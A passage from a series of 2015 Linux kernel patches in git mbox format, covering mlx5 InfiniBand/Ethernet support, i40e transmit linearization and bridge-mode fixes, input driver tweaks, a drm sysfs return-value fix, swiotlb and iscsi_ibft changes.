*/ + if (MLX5_CAP_GEN(mdev, port_type) == MLX5_CAP_PORT_TYPE_ETH) + return NULL; + printk_once(KERN_INFO "%s", mlx5_version); dev = (struct mlx5_ib_dev *)ib_alloc_device(sizeof(*dev)); From 4aa17b2879f66e478aa9b81cc3bbade6416126aa Mon Sep 17 00:00:00 2001 From: Haggai Abramonvsky Date: Thu, 4 Jun 2015 19:30:48 +0300 Subject: [PATCH 719/872] mlx5: Enable mutual support for IB and Ethernet Ethernet functionality is only available when working in ISSI > 0 mode. Previously, the IB driver wasn't ready to work on that mode, and hence building both the IB driver and the Ethernet functionality in the core driver were disallowed by Kconfigs. Now, once we have all the pre-steps in place, we can remove this limitation. The last steps in the IB driver for getting that setup to work are: create dummy SRQ for the driver's use (until now we could use XRC_SRQ as SRQ and XRC_SRQ, after moving to ISSI > 0, we separate XRC SRQs from basic SRQs) and adapt the create QP function to be compatible with ISSI > 0. Signed-off-by: Haggai Abramovsky Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/infiniband/hw/mlx5/main.c | 22 +++++++++++++++++++ drivers/infiniband/hw/mlx5/mlx5_ib.h | 1 + drivers/infiniband/hw/mlx5/qp.c | 3 ++- .../net/ethernet/mellanox/mlx5/core/Kconfig | 2 +- drivers/net/ethernet/mellanox/mlx5/core/qp.c | 7 ++++++ 5 files changed, 33 insertions(+), 2 deletions(-) diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c index f82969257332..d4dea86052d6 100644 --- a/drivers/infiniband/hw/mlx5/main.c +++ b/drivers/infiniband/hw/mlx5/main.c @@ -1324,8 +1324,29 @@ static int create_dev_resources(struct mlx5_ib_resources *devr) atomic_inc(&devr->p0->usecnt); atomic_set(&devr->s0->usecnt, 0); + memset(&attr, 0, sizeof(attr)); + attr.attr.max_sge = 1; + attr.attr.max_wr = 1; + attr.srq_type = IB_SRQT_BASIC; + devr->s1 = mlx5_ib_create_srq(devr->p0, &attr, NULL); + if (IS_ERR(devr->s1)) { + ret = PTR_ERR(devr->s1); + goto error5; + } + devr->s1->device = &dev->ib_dev; + devr->s1->pd = devr->p0; + devr->s1->uobject = NULL; + devr->s1->event_handler = NULL; + devr->s1->srq_context = NULL; + devr->s1->srq_type = IB_SRQT_BASIC; + devr->s1->ext.xrc.cq = devr->c0; + atomic_inc(&devr->p0->usecnt); + atomic_set(&devr->s0->usecnt, 0); + return 0; +error5: + mlx5_ib_destroy_srq(devr->s0); error4: mlx5_ib_dealloc_xrcd(devr->x1); error3: @@ -1340,6 +1361,7 @@ static int create_dev_resources(struct mlx5_ib_resources *devr) static void destroy_dev_resources(struct mlx5_ib_resources *devr) { + mlx5_ib_destroy_srq(devr->s1); mlx5_ib_destroy_srq(devr->s0); mlx5_ib_dealloc_xrcd(devr->x0); mlx5_ib_dealloc_xrcd(devr->x1); diff --git a/drivers/infiniband/hw/mlx5/mlx5_ib.h b/drivers/infiniband/hw/mlx5/mlx5_ib.h index f731b2592a36..873dc354766a 100644 --- a/drivers/infiniband/hw/mlx5/mlx5_ib.h +++ b/drivers/infiniband/hw/mlx5/mlx5_ib.h @@ -415,6 +415,7 @@ struct mlx5_ib_resources { struct ib_xrcd *x1; struct ib_pd *p0; struct ib_srq *s0; + struct ib_srq *s1; }; struct mlx5_ib_dev { diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c index 15fd485d1ad9..203c8a45e095 100644 --- a/drivers/infiniband/hw/mlx5/qp.c +++ b/drivers/infiniband/hw/mlx5/qp.c @@ -1012,7 +1012,8 @@ static int create_qp_common(struct mlx5_ib_dev *dev, struct ib_pd *pd, in->ctx.rq_type_srqn |= cpu_to_be32(to_msrq(init_attr->srq)->msrq.srqn); } else { in->ctx.xrcd = cpu_to_be32(to_mxrcd(devr->x1)->xrcdn); - in->ctx.rq_type_srqn |= cpu_to_be32(to_msrq(devr->s0)->msrq.srqn); + 
in->ctx.rq_type_srqn |= + cpu_to_be32(to_msrq(devr->s1)->msrq.srqn); } } diff --git a/drivers/net/ethernet/mellanox/mlx5/core/Kconfig b/drivers/net/ethernet/mellanox/mlx5/core/Kconfig index 0d7aef040fb0..158c88c69ef9 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/Kconfig +++ b/drivers/net/ethernet/mellanox/mlx5/core/Kconfig @@ -12,7 +12,7 @@ config MLX5_CORE config MLX5_CORE_EN bool "Mellanox Technologies ConnectX-4 Ethernet support" - depends on MLX5_INFINIBAND=n && NETDEVICES && ETHERNET && PCI && MLX5_CORE + depends on NETDEVICES && ETHERNET && PCI && MLX5_CORE default n ---help--- Ethernet support in Mellanox Technologies ConnectX-4 NIC. diff --git a/drivers/net/ethernet/mellanox/mlx5/core/qp.c b/drivers/net/ethernet/mellanox/mlx5/core/qp.c index dc7dbf7e9d98..8b494b562263 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/qp.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/qp.c @@ -187,10 +187,17 @@ int mlx5_core_create_qp(struct mlx5_core_dev *dev, struct mlx5_destroy_qp_mbox_in din; struct mlx5_destroy_qp_mbox_out dout; int err; + void *qpc; memset(&out, 0, sizeof(out)); in->hdr.opcode = cpu_to_be16(MLX5_CMD_OP_CREATE_QP); + if (dev->issi) { + qpc = MLX5_ADDR_OF(create_qp_in, in, qpc); + /* 0xffffff means we ask to work with cqe version 0 */ + MLX5_SET(qpc, qpc, user_index, 0xffffff); + } + err = mlx5_cmd_exec(dev, in, inlen, &out, sizeof(out)); if (err) { mlx5_core_warn(dev, "ret %d\n", err); From f76502aa9140ec338a59487218bf70a9c9e92b8f Mon Sep 17 00:00:00 2001 From: Geert Uytterhoeven Date: Thu, 4 Jun 2015 11:34:41 +0200 Subject: [PATCH 720/872] of/dynamic: Fix test for PPC_PSERIES "IS_ENABLED(PPC_PSERIES)" always evaluates to false, as IS_ENABLED() is supposed to be used with the full Kconfig symbol name, including the "CONFIG_" prefix. Add the missing "CONFIG_" prefix to fix this. Fixes: a25095d451ece23b ("of: Move dynamic node fixups out of powerpc and into common code") Signed-off-by: Geert Uytterhoeven Cc: stable@vger.kernel.org #+3.17 Signed-off-by: Grant Likely --- drivers/of/dynamic.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/of/dynamic.c b/drivers/of/dynamic.c index 3351ef408125..53826b84e0ec 100644 --- a/drivers/of/dynamic.c +++ b/drivers/of/dynamic.c @@ -225,7 +225,7 @@ void __of_attach_node(struct device_node *np) phandle = __of_get_property(np, "phandle", &sz); if (!phandle) phandle = __of_get_property(np, "linux,phandle", &sz); - if (IS_ENABLED(PPC_PSERIES) && !phandle) + if (IS_ENABLED(CONFIG_PPC_PSERIES) && !phandle) phandle = __of_get_property(np, "ibm,phandle", &sz); np->phandle = (phandle && (sz >= 4)) ? be32_to_cpup(phandle) : 0; From 30520831f058cd9d75c0f6b360bc5c5ae49b5f27 Mon Sep 17 00:00:00 2001 From: Anjali Singhai Jain Date: Fri, 8 May 2015 15:35:52 -0700 Subject: [PATCH 721/872] i40e/i40evf: Fix mixed size frags and linearization This patch fixes a bug where the i40e Tx queue will hang if this skb is passed to the driver. With mixed size fragments while using TSO there was a corner case where we needed to linearize but we were not. 
This was seen with iSCSI traffic and could be reproduced with a frag list that looks like this: num_frags = 17, gso_segs = 17, hdr_len = 66, skb_shinfo(skb)->gso_size = 1448 size = 3002, j = 1, frag_size = 2936, num_frags = 17 size = 4268, j = 1, frag_size = 4096, num_frags = 16 size = 5534, j = 1, frag_size = 4096, num_frags = 15 size = 5352, j = 1, frag_size = 4096, num_frags = 14 size = 5170, j = 1, frag_size = 4096, num_frags = 13 size = 3468, j = 1, frag_size = 2576, num_frags = 12 size = 750, j = 1, frag_size = 112, num_frags = 11 size = 862, j = 2, frag_size = 112, num_frags = 10 size = 974, j = 3, frag_size = 112, num_frags = 9 size = 1126, j = 4, frag_size = 152, num_frags = 8 size = 1330, j = 5, frag_size = 204, num_frags = 7 size = 1534, j = 6, frag_size = 204, num_frags = 6 size = 356, j = 1, frag_size = 204, num_frags = 5 size = 560, j = 2, frag_size = 204, num_frags = 4 size = 764, j = 3, frag_size = 204, num_frags = 3 size = 968, j = 4, frag_size = 204, num_frags = 2 size = 1140, j = 5, frag_size = 172, num_frags = 1 result: linearize = 0, j = 6 Change-ID: I79bb1aeab0af255fe2ce28e93672a85d85bf47e8 Signed-off-by: Anjali Singhai Jain Signed-off-by: Jesse Brandeburg Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_txrx.c | 25 ++++++++----------- drivers/net/ethernet/intel/i40evf/i40e_txrx.c | 25 ++++++++----------- 2 files changed, 20 insertions(+), 30 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c index 4bd3a80aba82..9d95042d5a0f 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c @@ -2410,14 +2410,12 @@ static int i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) * i40e_chk_linearize - Check if there are more than 8 fragments per packet * @skb: send buffer * @tx_flags: collected send information - * @hdr_len: size of the packet header * * Note: Our HW can't scatter-gather more than 8 fragments to build * a packet on the wire and so we need to figure out the cases where we * need to linearize the skb. **/ -static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, - const u8 hdr_len) +static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags) { struct skb_frag_struct *frag; bool linearize = false; @@ -2429,7 +2427,7 @@ static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, gso_segs = skb_shinfo(skb)->gso_segs; if (tx_flags & (I40E_TX_FLAGS_TSO | I40E_TX_FLAGS_FSO)) { - u16 j = 1; + u16 j = 0; if (num_frags < (I40E_MAX_BUFFER_TXD)) goto linearize_chk_done; @@ -2440,21 +2438,18 @@ static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, goto linearize_chk_done; } frag = &skb_shinfo(skb)->frags[0]; - size = hdr_len; /* we might still have more fragments per segment */ do { size += skb_frag_size(frag); frag++; j++; + if ((size >= skb_shinfo(skb)->gso_size) && + (j < I40E_MAX_BUFFER_TXD)) { + size = (size % skb_shinfo(skb)->gso_size); + j = (size) ? 
1 : 0; + } if (j == I40E_MAX_BUFFER_TXD) { - if (size < skb_shinfo(skb)->gso_size) { - linearize = true; - break; - } - j = 1; - size -= skb_shinfo(skb)->gso_size; - if (size) - j++; - size += hdr_len; + linearize = true; + break; } num_frags--; } while (num_frags); @@ -2724,7 +2719,7 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, if (tsyn) tx_flags |= I40E_TX_FLAGS_TSYN; - if (i40e_chk_linearize(skb, tx_flags, hdr_len)) + if (i40e_chk_linearize(skb, tx_flags)) if (skb_linearize(skb)) goto out_drop; diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c index b077e02a0cc7..458fbb421090 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c @@ -1619,14 +1619,12 @@ static void i40e_create_tx_ctx(struct i40e_ring *tx_ring, * i40e_chk_linearize - Check if there are more than 8 fragments per packet * @skb: send buffer * @tx_flags: collected send information - * @hdr_len: size of the packet header * * Note: Our HW can't scatter-gather more than 8 fragments to build * a packet on the wire and so we need to figure out the cases where we * need to linearize the skb. **/ -static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, - const u8 hdr_len) +static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags) { struct skb_frag_struct *frag; bool linearize = false; @@ -1638,7 +1636,7 @@ static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, gso_segs = skb_shinfo(skb)->gso_segs; if (tx_flags & (I40E_TX_FLAGS_TSO | I40E_TX_FLAGS_FSO)) { - u16 j = 1; + u16 j = 0; if (num_frags < (I40E_MAX_BUFFER_TXD)) goto linearize_chk_done; @@ -1649,21 +1647,18 @@ static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, goto linearize_chk_done; } frag = &skb_shinfo(skb)->frags[0]; - size = hdr_len; /* we might still have more fragments per segment */ do { size += skb_frag_size(frag); frag++; j++; + if ((size >= skb_shinfo(skb)->gso_size) && + (j < I40E_MAX_BUFFER_TXD)) { + size = (size % skb_shinfo(skb)->gso_size); + j = (size) ? 1 : 0; + } if (j == I40E_MAX_BUFFER_TXD) { - if (size < skb_shinfo(skb)->gso_size) { - linearize = true; - break; - } - j = 1; - size -= skb_shinfo(skb)->gso_size; - if (size) - j++; - size += hdr_len; + linearize = true; + break; } num_frags--; } while (num_frags); @@ -1950,7 +1945,7 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, else if (tso) tx_flags |= I40E_TX_FLAGS_TSO; - if (i40e_chk_linearize(skb, tx_flags, hdr_len)) + if (i40e_chk_linearize(skb, tx_flags)) if (skb_linearize(skb)) goto out_drop; From fc60861e9b00388fd11d7995a60bf0b1e61dba93 Mon Sep 17 00:00:00 2001 From: Anjali Singhai Jain Date: Fri, 8 May 2015 15:35:57 -0700 Subject: [PATCH 722/872] i40e: start up in VEPA mode by default The patch fixes a bug in the default configuration which prevented a software bridge loaded on the PF interface from working correctly because broadcast packets are incorrectly looped back. Fix the general case, by loading the driver in VEPA mode Until a VF or VMDq VSI is added. This way loopback on the Main VSI is turned off until needed and can resolve the issue of unnecessary reflection for users that do not have VF or VMDq VSIs setup. The driver must now coordinate the loopback setting for the Flow Director (FDIR) VSI to make sure it is in sync with the current VEB or VEPA mode setting. The user can still switch bridge modes from the bridge commands and choose to be in VEPA mode with VF VSIs. 
Because of hardware requirements, the call to switch to VEB mode when no VF/VMDqs are present will be rejected. NOTE: This patch uses BIT_ULL as that is preferred going forward, a followup patch in the lower priority queue to net-next will fix up the remaining 1 << usages. Change-ID: Ib121ddb18fe4b3c4f52e9deda6fcbeb9105683d1 Signed-off-by: Anjali Singhai Jain Signed-off-by: Jesse Brandeburg Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e.h | 1 + .../net/ethernet/intel/i40e/i40e_debugfs.c | 9 ++++++++ drivers/net/ethernet/intel/i40e/i40e_main.c | 21 +++++++++++++++---- .../ethernet/intel/i40e/i40e_virtchnl_pf.c | 10 ++++++++- 4 files changed, 36 insertions(+), 5 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e.h b/drivers/net/ethernet/intel/i40e/i40e.h index 33c35d3b7420..5d47307121ab 100644 --- a/drivers/net/ethernet/intel/i40e/i40e.h +++ b/drivers/net/ethernet/intel/i40e/i40e.h @@ -317,6 +317,7 @@ struct i40e_pf { #endif #define I40E_FLAG_PORT_ID_VALID (u64)(1 << 28) #define I40E_FLAG_DCB_CAPABLE (u64)(1 << 29) +#define I40E_FLAG_VEB_MODE_ENABLED BIT_ULL(40) /* tracks features that get auto disabled by errors */ u64 auto_disable_flags; diff --git a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c index 34170eabca7d..da0faf478af0 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c +++ b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c @@ -1021,6 +1021,15 @@ static ssize_t i40e_dbg_command_write(struct file *filp, goto command_write_done; } + /* By default we are in VEPA mode, if this is the first VF/VMDq + * VSI to be added switch to VEB mode. + */ + if (!(pf->flags & I40E_FLAG_VEB_MODE_ENABLED)) { + pf->flags |= I40E_FLAG_VEB_MODE_ENABLED; + i40e_do_reset_safe(pf, + BIT_ULL(__I40E_PF_RESET_REQUESTED)); + } + vsi = i40e_vsi_setup(pf, I40E_VSI_VMDQ2, vsi_seid, 0); if (vsi) dev_info(&pf->pdev->dev, "added VSI %d to relay %d\n", diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c index a54c14491e3b..853eb2f7e558 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_main.c +++ b/drivers/net/ethernet/intel/i40e/i40e_main.c @@ -6097,6 +6097,10 @@ static int i40e_reconstitute_veb(struct i40e_veb *veb) if (ret) goto end_reconstitute; + if (pf->flags & I40E_FLAG_VEB_MODE_ENABLED) + veb->bridge_mode = BRIDGE_MODE_VEB; + else + veb->bridge_mode = BRIDGE_MODE_VEPA; i40e_config_bridge_mode(veb); /* create the remaining VSIs attached to this VEB */ @@ -8031,7 +8035,12 @@ static int i40e_ndo_bridge_setlink(struct net_device *dev, } else if (mode != veb->bridge_mode) { /* Existing HW bridge but different mode needs reset */ veb->bridge_mode = mode; - i40e_do_reset(pf, (1 << __I40E_PF_RESET_REQUESTED)); + /* TODO: If no VFs or VMDq VSIs, disallow VEB mode */ + if (mode == BRIDGE_MODE_VEB) + pf->flags |= I40E_FLAG_VEB_MODE_ENABLED; + else + pf->flags &= ~I40E_FLAG_VEB_MODE_ENABLED; + i40e_do_reset(pf, BIT_ULL(__I40E_PF_RESET_REQUESTED)); break; } } @@ -8343,11 +8352,12 @@ static int i40e_add_vsi(struct i40e_vsi *vsi) ctxt.uplink_seid = vsi->uplink_seid; ctxt.connection_type = I40E_AQ_VSI_CONN_TYPE_NORMAL; ctxt.flags = I40E_AQ_VSI_TYPE_PF; - if (i40e_is_vsi_uplink_mode_veb(vsi)) { + if ((pf->flags & I40E_FLAG_VEB_MODE_ENABLED) && + (i40e_is_vsi_uplink_mode_veb(vsi))) { ctxt.info.valid_sections |= - cpu_to_le16(I40E_AQ_VSI_PROP_SWITCH_VALID); + cpu_to_le16(I40E_AQ_VSI_PROP_SWITCH_VALID); ctxt.info.switch_id = - cpu_to_le16(I40E_AQ_VSI_SW_ID_FLAG_ALLOW_LB); 
+ cpu_to_le16(I40E_AQ_VSI_SW_ID_FLAG_ALLOW_LB); } i40e_vsi_setup_queue_map(vsi, &ctxt, enabled_tc, true); break; @@ -8746,6 +8756,9 @@ struct i40e_vsi *i40e_vsi_setup(struct i40e_pf *pf, u8 type, __func__); return NULL; } + /* We come up by default in VEPA mode */ + veb->bridge_mode = BRIDGE_MODE_VEPA; + pf->flags &= ~I40E_FLAG_VEB_MODE_ENABLED; i40e_config_bridge_mode(veb); } for (i = 0; i < I40E_MAX_VEB && !veb; i++) { diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c index 78d1c4ff565e..4e9376da0518 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c +++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c @@ -1018,11 +1018,19 @@ int i40e_pci_sriov_configure(struct pci_dev *pdev, int num_vfs) { struct i40e_pf *pf = pci_get_drvdata(pdev); - if (num_vfs) + if (num_vfs) { + if (!(pf->flags & I40E_FLAG_VEB_MODE_ENABLED)) { + pf->flags |= I40E_FLAG_VEB_MODE_ENABLED; + i40e_do_reset_safe(pf, + BIT_ULL(__I40E_PF_RESET_REQUESTED)); + } return i40e_pci_sriov_enable(pdev, num_vfs); + } if (!pci_vfs_assigned(pf->pdev)) { i40e_free_vfs(pf); + pf->flags &= ~I40E_FLAG_VEB_MODE_ENABLED; + i40e_do_reset_safe(pf, BIT_ULL(__I40E_PF_RESET_REQUESTED)); } else { dev_warn(&pdev->dev, "Unable to free VFs because some are assigned to VMs.\n"); return -EINVAL; From fa11cb3d16a9b9b296a2b811a49faf1356240348 Mon Sep 17 00:00:00 2001 From: Anjali Singhai Jain Date: Wed, 27 May 2015 12:06:14 -0400 Subject: [PATCH 723/872] i40e: Make sure to be in VEB mode if SRIOV is enabled at probe If SRIOV is enabled we need to be in VEB mode not VEPA mode at probe. This fixes an NPAR bug when SRIOV is enabled in the BIOS. Change-ID: Ibf006abafd9a0ca3698ec24848cd771cf345cbbc Signed-off-by: Anjali Singhai Jain Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_main.c | 20 +++++++++++++++++--- 1 file changed, 17 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c index 853eb2f7e558..5b5bea159bd5 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_main.c +++ b/drivers/net/ethernet/intel/i40e/i40e_main.c @@ -8756,9 +8756,14 @@ struct i40e_vsi *i40e_vsi_setup(struct i40e_pf *pf, u8 type, __func__); return NULL; } - /* We come up by default in VEPA mode */ - veb->bridge_mode = BRIDGE_MODE_VEPA; - pf->flags &= ~I40E_FLAG_VEB_MODE_ENABLED; + /* We come up by default in VEPA mode if SRIOV is not + * already enabled, in which case we can't force VEPA + * mode. 
+ */ + if (!(pf->flags & I40E_FLAG_VEB_MODE_ENABLED)) { + veb->bridge_mode = BRIDGE_MODE_VEPA; + pf->flags &= ~I40E_FLAG_VEB_MODE_ENABLED; + } i40e_config_bridge_mode(veb); } for (i = 0; i < I40E_MAX_VEB && !veb; i++) { @@ -9869,6 +9874,15 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent) goto err_switch_setup; } +#ifdef CONFIG_PCI_IOV + /* prep for VF support */ + if ((pf->flags & I40E_FLAG_SRIOV_ENABLED) && + (pf->flags & I40E_FLAG_MSIX_ENABLED) && + !test_bit(__I40E_BAD_EEPROM, &pf->state)) { + if (pci_num_vf(pdev)) + pf->flags |= I40E_FLAG_VEB_MODE_ENABLED; + } +#endif err = i40e_setup_pf_switch(pf, false); if (err) { dev_info(&pdev->dev, "setup_pf_switch failed: %d\n", err); From 692dd1916436164e228608803dfb6cb768d6355a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=B4=AA=E4=B8=80=E7=AB=B9?= Date: Thu, 4 Jun 2015 22:00:24 -0700 Subject: [PATCH 724/872] Input: elantech - add new icbody type This adds new icbody type to the list recognized by Elantech PS/2 driver. Cc: stable@vger.kernel.org Signed-off-by: Sam Hung Signed-off-by: Dmitry Torokhov --- drivers/input/mouse/elantech.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/input/mouse/elantech.c b/drivers/input/mouse/elantech.c index f181d73d9629..ce3d40004458 100644 --- a/drivers/input/mouse/elantech.c +++ b/drivers/input/mouse/elantech.c @@ -1556,6 +1556,7 @@ static int elantech_set_properties(struct elantech_data *etd) case 9: case 10: case 13: + case 14: etd->hw_version = 4; break; default: From 088df2ccef75754cc16a6ba31829d23bcb2b68ed Mon Sep 17 00:00:00 2001 From: Hans de Goede Date: Thu, 4 Jun 2015 22:31:43 -0700 Subject: [PATCH 725/872] Input: alps - do not reduce trackpoint speed by half On some v7 devices (e.g. Lenovo-E550) the deltas reported are typically only in the 0-1 range dividing this by 2 results in a range of 0-0. And even for v7 devices where this does not lead to making the trackstick entirely unusable, it makes it twice as slow as before we added v7 support and were using the ps/2 mouse emulation of the dual point setup. If some kind of generic slowdown is actually necessary for some devices, then that belongs in userspace, not in the kernel. Cc: stable@vger.kernel.org Reported-and-tested-by: Rico Moorman Signed-off-by: Hans de Goede Reviewed-by: Benjamin Tissoires Signed-off-by: Dmitry Torokhov --- drivers/input/mouse/alps.c | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/drivers/input/mouse/alps.c b/drivers/input/mouse/alps.c index 7752bd59d4b7..a353b7de6d22 100644 --- a/drivers/input/mouse/alps.c +++ b/drivers/input/mouse/alps.c @@ -1063,9 +1063,8 @@ static void alps_process_trackstick_packet_v7(struct psmouse *psmouse) right = (packet[1] & 0x02) >> 1; middle = (packet[1] & 0x04) >> 2; - /* Divide 2 since trackpoint's speed is too fast */ - input_report_rel(dev2, REL_X, (char)x / 2); - input_report_rel(dev2, REL_Y, -((char)y / 2)); + input_report_rel(dev2, REL_X, (char)x); + input_report_rel(dev2, REL_Y, -((char)y)); input_report_key(dev2, BTN_LEFT, left); input_report_key(dev2, BTN_RIGHT, right); From 38d8571dad8a759bdc051dbff747b189c90658cf Mon Sep 17 00:00:00 2001 From: Russell King Date: Sat, 6 Jun 2015 08:27:30 +1000 Subject: [PATCH 726/872] drm: fix writing to /sys/class/drm/*/status Writing to a file is supposed to return the number of bytes written. Returning zero unfortunately causes bash to constantly spin trying to write to the sysfs file, to such an extent that even ^c and ^z have no effect. 
The only way out of that is to kill the shell and log back in. This isn't nice behaviour. Fix it by returning the number of characters written to sysfs files. [airlied: used suggestion from Al Viro] Signed-off-by: Russell King Reviewed-by: Chris Wilson Signed-off-by: Dave Airlie --- drivers/gpu/drm/drm_sysfs.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/gpu/drm/drm_sysfs.c b/drivers/gpu/drm/drm_sysfs.c index ffc305fc2076..eb7e61078a5b 100644 --- a/drivers/gpu/drm/drm_sysfs.c +++ b/drivers/gpu/drm/drm_sysfs.c @@ -217,7 +217,7 @@ static ssize_t status_store(struct device *device, mutex_unlock(&dev->mode_config.mutex); - return ret; + return ret ? ret : count; } static ssize_t status_show(struct device *device, From 023600f192be3f5776336e2c61d577b551a1ca9c Mon Sep 17 00:00:00 2001 From: Alexandre Courbot Date: Tue, 26 May 2015 18:02:54 +0900 Subject: [PATCH 727/872] swiotlb: do not export map_single function The map_single() function is not defined as static, even though it doesn't seem to be used anywhere else in the kernel. Make it static to avoid namespace pollution since this is a rather generic symbol. Signed-off-by: Alexandre Courbot Signed-off-by: Konrad Rzeszutek Wilk --- lib/swiotlb.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/lib/swiotlb.c b/lib/swiotlb.c index 4abda074ea45..3c365ab6cf5f 100644 --- a/lib/swiotlb.c +++ b/lib/swiotlb.c @@ -537,8 +537,9 @@ EXPORT_SYMBOL_GPL(swiotlb_tbl_map_single); * Allocates bounce buffer and returns its kernel virtual address. */ -phys_addr_t map_single(struct device *hwdev, phys_addr_t phys, size_t size, - enum dma_data_direction dir) +static phys_addr_t +map_single(struct device *hwdev, phys_addr_t phys, size_t size, + enum dma_data_direction dir) { dma_addr_t start_dma_addr = phys_to_dma(hwdev, io_tlb_start); From e6050b61df8a8765ce4e99da0b593d781c7fdfb1 Mon Sep 17 00:00:00 2001 From: Chris Leech Date: Thu, 28 May 2015 12:51:51 -0700 Subject: [PATCH 728/872] iscsi_ibft: filter null v4-mapped v6 addresses I've had reports of UEFI platforms failing iSCSI boot in various configurations, that ended up being caused by network initialization scripts getting tripped up by unexpected null addresses (0.0.0.0) being reported for gateways, dhcp servers, and dns servers. The tianocore EDK2 iSCSI driver generates an iBFT table that always uses IPv4-mapped IPv6 addresses for the NIC structure fields. This results in values that are "not present or not specified" being reported as ::ffff:0.0.0.0 rather than all zeros as specified. The iscsi_ibft module filters unspecified fields from the iBFT from sysfs, preventing userspace from using invalid values and making it easy to check for the presence of a value. This currently fails in regard to these mapped null addresses. In order to remain consistent with how the iBFT information is exposed, we should accommodate the behavior of the tianocore iSCSI driver as it's already in the wild in a large number of servers. Tested under qemu using an OVMF build of tianocore EDK2. 
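For reference, the filtering rule described above reduces to the following standalone sketch. It is a simplified restatement of the address_not_null() helper introduced by the hunk below, not part of the patch itself, and the sample addresses in main() are illustrative only:

#include <stdio.h>
#include <string.h>

/* An address is treated as "not present" if it is either all zeros or the
 * IPv4-mapped IPv6 null address ::ffff:0.0.0.0 emitted by the EDK2 driver. */
static const unsigned char nulls[16];
static const unsigned char mapped_nulls[16] = {
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00
};

static int address_not_null(const unsigned char *ip)
{
	return memcmp(ip, nulls, 16) && memcmp(ip, mapped_nulls, 16);
}

int main(void)
{
	/* illustrative values: a mapped null gateway vs. a real ::ffff:10.0.0.1 */
	unsigned char absent[16]  = { 0, 0, 0, 0, 0, 0, 0, 0,
				      0, 0, 0xff, 0xff, 0, 0, 0, 0 };
	unsigned char present[16] = { 0, 0, 0, 0, 0, 0, 0, 0,
				      0, 0, 0xff, 0xff, 10, 0, 0, 1 };

	printf("absent:  %d\n", address_not_null(absent));  /* 0 -> field hidden from sysfs */
	printf("present: %d\n", address_not_null(present)); /* 1 -> field exposed in sysfs */
	return 0;
}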
Signed-off-by: Chris Leech Reviewed-by: Mike Christie Signed-off-by: Konrad Rzeszutek Wilk --- drivers/firmware/iscsi_ibft.c | 36 ++++++++++++++++++++--------------- 1 file changed, 21 insertions(+), 15 deletions(-) diff --git a/drivers/firmware/iscsi_ibft.c b/drivers/firmware/iscsi_ibft.c index 071c2c969eec..72791232e46b 100644 --- a/drivers/firmware/iscsi_ibft.c +++ b/drivers/firmware/iscsi_ibft.c @@ -186,8 +186,20 @@ struct ibft_kobject { static struct iscsi_boot_kset *boot_kset; +/* fully null address */ static const char nulls[16]; +/* IPv4-mapped IPv6 ::ffff:0.0.0.0 */ +static const char mapped_nulls[16] = { 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0xff, 0xff, + 0x00, 0x00, 0x00, 0x00 }; + +static int address_not_null(u8 *ip) +{ + return (memcmp(ip, nulls, 16) && memcmp(ip, mapped_nulls, 16)); +} + /* * Helper functions to parse data properly. */ @@ -445,7 +457,7 @@ static umode_t ibft_check_nic_for(void *data, int type) rc = S_IRUGO; break; case ISCSI_BOOT_ETH_IP_ADDR: - if (memcmp(nic->ip_addr, 